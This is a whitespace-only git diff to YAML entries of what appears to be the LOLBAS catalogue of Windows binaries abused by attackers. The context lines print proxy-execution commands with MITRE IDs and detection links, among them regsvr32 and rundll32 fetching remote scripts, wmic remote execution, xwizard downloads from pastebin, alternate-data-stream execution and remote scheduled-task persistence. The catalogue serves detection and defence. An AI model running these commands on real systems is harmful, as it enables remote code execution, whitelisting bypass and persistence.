diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index a63a2a8..0898d43 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: XBAP + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 7f5b18b..16d6a11 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 43dc039..979d24d 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -22,7 +22,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -31,8 +31,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -41,7 +41,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index e1bb40c..5d60b29 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -30,7 +30,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -39,7 +39,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution @@ -48,7 +48,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -57,7 +57,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 545b1c1..eafab60 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index fb02475..40b17aa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2e58c2e..535aeff 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index bd016f0..7766c06 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -21,7 +21,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index c37e48e..82f9ab2 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 4c5b141..bd8b118 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -21,8 +21,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: CMD + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 6797060..4e4dd1d 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 13fb36f..2fbd1f6 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 6d651b1..27a9f12 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index aa42bf6..8c62daf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ec4e8b0..3d0cdd5 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 42f0d66..145bd6f 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1909 and below Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index c12ae91..7c51f38 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index fabfae4..541818d 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 2751183..e42e6b7 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c8e61fc..6fa837f 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index d6be4bc..f914071 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: EXE + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 10f96cc..913ce05 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 133c4a8..49d52ef 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -30,8 +30,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE - - Execute: Remote + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -40,8 +40,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: XSL - - Execute: Remote + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6287b77..d2dd19a 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 87076e3..e7d9b93 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 8da75b1..b6204bf 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -28,7 +28,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index c89260d..e9ce1bd 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 13b34e4..a96fe54 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: